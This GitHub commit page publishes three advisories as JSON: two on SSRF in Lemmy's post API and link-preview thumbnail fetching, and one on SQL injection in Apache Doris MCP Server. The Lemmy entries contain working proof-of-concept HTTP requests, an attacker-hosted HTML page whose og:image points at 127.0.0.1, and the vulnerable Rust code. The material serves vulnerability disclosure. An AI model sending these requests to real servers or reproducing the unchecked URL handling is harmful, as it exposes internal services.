Skip to content

Commit d208074

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-3jvj-v6w2-h948 GHSA-h6hf-9846-xwrq GHSA-qhfq-gvvc-5q6q GHSA-qhfq-gvvc-5q6q
1 parent 439cff0 commit d208074

4 files changed

Lines changed: 191 additions & 40 deletions

File tree

advisories/github-reviewed/2026/04/GHSA-3jvj-v6w2-h948/GHSA-3jvj-v6w2-h948.json

Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-3jvj-v6w2-h948",
4+
"modified": "2026-04-24T15:22:49Z",
5+
"published": "2026-04-24T15:22:49Z",
6+
"aliases": [],
7+
"summary": "Lemmy has SSRF in /api/v3/post via Webmention dispatch",
8+
"details": "### Summary\nLemmy allows an authenticated low-privileged user to create a link post through `POST /api/v3/post`. When a post is created in a public community, the backend asynchronously sends a Webmention to the attacker-controlled link target.\n\nThe submitted URL is checked for syntax and scheme, but the audited code path does not reject loopback, private, or link-local destinations before the Webmention request is issued. This lets a normal user trigger server-side HTTP requests toward internal services.\n\n### Details\nThe entry point is the normal post creation API. The user-controlled `url` field is accepted, normalized with `diesel_url_create()`, and only validated with `is_valid_url()`. That validation allows `http` and `https` but does not implement internal address rejection.\n\nThe post creation flow then schedules Webmention delivery for public communities. This creates a direct source-to-sink path from an externally supplied post URL to a server-side outbound HTTP request.\n\nCore vulnerable code path:\n\n```rust\n// crates/api_crud/src/post/create.rs\nlet url = diesel_url_create(data.url.as_deref())?;\nif let Some(url) = &url {\n is_url_blocked(url, &url_blocklist)?;\n is_valid_url(url)?;\n}\n```\n\n```rust\n// crates/utils/src/utils/validation.rs\npub fn is_valid_url(url: &Url) -> LemmyResult<()> {\n let is_valid = [\"http\", \"https\", \"magnet\"].contains(&url.scheme());\n if !is_valid {\n Err(LemmyErrorType::InvalidUrl)?\n }\n Ok(())\n}\n```\n\n```rust\n// crates/api_crud/src/post/create.rs\nif community.visibility == CommunityVisibility::Public {\n let post = inserted_post.clone();\n let url = url.clone();\n spawn_try_task(async move {\n if let Some(url) = url {\n Webmention::new(post.ap_id.clone().into(), url.into()).send().await?;\n }\n Ok(())\n });\n}\n```\n\nThese snippets matter because they show that the attacker controls `CreatePost.url`, the only validation is scheme-level, and the resulting URL is later used for server-side Webmention delivery.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._Prerequisites:\n\n- The attacker has a valid low-privileged account.\n- The attacker can post to a public community.\n\nPractical reproduction flow:\n\n1. Run an HTTP listener on an internal or loopback-reachable address from the Lemmy server's perspective, such as `127.0.0.1:8081`.\n2. Authenticate as a normal user.\n3. Submit a post to a public community with `url` set to the internal target.\n4. Observe the Lemmy API return a normal post creation response.\n5. Observe the internal HTTP listener receive a request from the Lemmy server shortly afterwards.\n\nComplete PoC:\n\n```http\nPOST /api/v3/post HTTP/1.1\nHost: victim.example\nAuthorization: Bearer <low-priv-jwt>\nContent-Type: application/json\n\n{\n \"name\": \"wm-ssrf\",\n \"community_id\": 1,\n \"url\": \"http://127.0.0.1:8081/\",\n \"body\": null,\n \"alt_text\": null,\n \"honeypot\": null,\n \"nsfw\": false,\n \"language_id\": null,\n \"custom_thumbnail\": null\n}\n```\n\nOutcome:\n\n- The API returns a successful `post_view` response.\n- The Lemmy server later issues an outbound request toward `http://127.0.0.1:8081/` as part of Webmention processing.\n### Impact\nAn authenticated user can use the application server as a blind SSRF primitive against internal HTTP services. This can expose internal network reachability, trigger internal webhooks or administrative endpoints, and expand the attack surface beyond the public deployment boundary.\n\nBecause the sink is reached after ordinary user content submission, the issue is practical to exploit in real deployments where normal users can post to public communities.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "crates.io",
19+
"name": "lemmy_api_common"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.19.18"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-3jvj-v6w2-h948"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/LemmyNet/lemmy/commit/1f06693b708020c5c3a3752bd2f1c6006a75e9bc"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/LemmyNet/lemmy"
48+
}
49+
],
50+
"database_specific": {
51+
"cwe_ids": [
52+
"CWE-918"
53+
],
54+
"severity": "MODERATE",
55+
"github_reviewed": true,
56+
"github_reviewed_at": "2026-04-24T15:22:49Z",
57+
"nvd_published_at": null
58+
}
59+
}

advisories/github-reviewed/2026/04/GHSA-h6hf-9846-xwrq/GHSA-h6hf-9846-xwrq.json

Lines changed: 63 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-h6hf-9846-xwrq",
4+
"modified": "2026-04-24T15:21:58Z",
5+
"published": "2026-04-24T15:21:58Z",
6+
"aliases": [],
7+
"summary": "Lemmy has SSRF and internal image disclosure in post link metadata via unvalidated og:image",
8+
"details": "### Summary\nLemmy fetches metadata for user-supplied post URLs and, under the default `StoreLinkPreviews` image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted `og:image` URL is not subject to the same restriction.\n\nAs a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users.\n\n### Details\nThe metadata fetch logic applies an internal-address check only to the initial post URL. After HTML parsing, `extract_opengraph_data()` accepts absolute `og:image` values and returns them as-is. Later, `generate_post_link_metadata()` passes that second-hop image URL into `generate_pictrs_thumbnail()`, which instructs local pict-rs to fetch it through `image/download?url=...`.\n\nThis creates a two-stage source-to-sink chain where the first URL is constrained, but the security boundary is bypassed through an unvalidated secondary resource.\n\nCore vulnerable code path:\n\n```rust\n// crates/api_common/src/request.rs\nlet metadata = match &post.url {\n Some(url) => fetch_link_metadata(url, &context, false).await.unwrap_or_default(),\n _ => Default::default(),\n};\n```\n\n```rust\n// crates/api_common/src/request.rs\nlet og_image = page\n .opengraph\n .images\n .first()\n .and_then(|ogo| url.join(&ogo.url).ok());\n```\n\n```rust\n// crates/api_common/src/request.rs\nlet thumbnail_url = if let (true, Some(url)) = (allow_generate_thumbnail, image_url.clone()) {\n generate_pictrs_thumbnail(&url, &context).await.ok().map(Into::into).or(image_url)\n} else {\n image_url.clone()\n};\n```\n\n```rust\n// crates/api_common/src/request.rs\nlet fetch_url = format!(\n \"{}image/download?url={}&resize={}\",\n pictrs_config.url,\n encode(image_url.as_str()),\n context.settings().pictrs_config()?.max_thumbnail_size\n);\n```\n\nThese snippets show that only the outer page URL is checked, while the extracted `og:image` value becomes a server-side fetch target without an equivalent internal-address guard.\n\n### PoC\nPrerequisites:\n\n- The attacker has a valid low-privileged account.\n- The instance uses the default link preview storage mode.\n- The attacker can post a link to a community they can access.\n\nPractical reproduction flow:\n\n1. Host a public HTML page under attacker control.\n2. Add an Open Graph image tag whose value points to an internal image URL reachable from the Lemmy host, such as `http://127.0.0.1:8081/internal.png`.\n3. Create a Lemmy post whose `url` is the attacker-controlled page.\n4. Observe Lemmy fetch the public page, extract `og:image`, and then fetch the internal image through pict-rs.\n5. Observe the created post receive a local thumbnail URL, demonstrating that the internal image was retrieved and cached.\n\nComplete PoC attacker page:\n\n```html\n<html><head>\n<meta property=\"og:image\" content=\"http://127.0.0.1:8081/internal.png\">\n</head><body>x</body></html>\n```\n\nComplete PoC request:\n\n```http\nPOST /api/v3/post HTTP/1.1\nHost: victim.example\nAuthorization: Bearer <low-priv-jwt>\nContent-Type: application/json\n\n{\n \"name\": \"thumb-ssrf\",\n \"community_id\": 1,\n \"url\": \"https://attacker.example/og.html\",\n \"body\": null,\n \"alt_text\": null,\n \"honeypot\": null,\n \"nsfw\": false,\n \"language_id\": null,\n \"custom_thumbnail\": null\n}\n```\n\nOutcome:\n\n- The post creation request succeeds.\n- The internal image endpoint receives a request from the Lemmy server.\n- The created post is updated with a local `thumbnail_url`, indicating that the internal image was fetched and cached.\n\n### Impact\nThis issue upgrades an attacker-controlled external page into an internal image fetch primitive. It can be used to retrieve internal image resources, expose content that is otherwise reachable only from the application host, and publish those internal resources through Lemmy's own thumbnail serving path.\n\nBecause the vulnerable mode is the documented default behavior for link previews, the issue is relevant even without non-default privacy settings.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "crates.io",
19+
"name": "lemmy_api_common"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.19.18"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/LemmyNet/lemmy/commit/9ffe586dafac1a46acf17edf90e0165e5503b2f1"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/LemmyNet/lemmy"
48+
},
49+
{
50+
"type": "WEB",
51+
"url": "https://join-lemmy.org/news/2026-04-20_-_Lemmy_Release_v0.19.18"
52+
}
53+
],
54+
"database_specific": {
55+
"cwe_ids": [
56+
"CWE-918"
57+
],
58+
"severity": "MODERATE",
59+
"github_reviewed": true,
60+
"github_reviewed_at": "2026-04-24T15:21:58Z",
61+
"nvd_published_at": null
62+
}
63+
}

advisories/github-reviewed/2026/04/GHSA-qhfq-gvvc-5q6q/GHSA-qhfq-gvvc-5q6q.json

Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-qhfq-gvvc-5q6q",
4+
"modified": "2026-04-24T15:24:04Z",
5+
"published": "2026-04-20T15:31:52Z",
6+
"aliases": [
7+
"CVE-2025-66335"
8+
],
9+
"summary": "Apache Doris MCP Server vulnerable to SQL Injection via improper query context neutralization",
10+
"details": "Apache Doris MCP Server versions prior to 0.6.1 are affected by an improper neutralization flaw in query context handling that may allow execution of unintended SQL statements and bypass of intended query validation and access restrictions through the MCP query execution interface. Versions 0.6.1 and later are not affected.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "doris-mcp-server"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0.1.0"
29+
},
30+
{
31+
"fixed": "0.6.1"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "ADVISORY",
41+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66335"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/apache/doris-mcp-server"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/apache/doris-mcp-server/releases/tag/0.6.1"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://lists.apache.org/thread/odp0fyyst8kxm7hhm9z4d1snh1y4hjpy"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "http://www.openwall.com/lists/oss-security/2026/04/17/4"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-89"
63+
],
64+
"severity": "MODERATE",
65+
"github_reviewed": true,
66+
"github_reviewed_at": "2026-04-24T15:24:04Z",
67+
"nvd_published_at": "2026-04-20T14:16:16Z"
68+
}
69+
}

advisories/unreviewed/2026/04/GHSA-qhfq-gvvc-5q6q/GHSA-qhfq-gvvc-5q6q.json

Lines changed: 0 additions & 40 deletions
This file was deleted.

0 commit comments

Comments
 (0)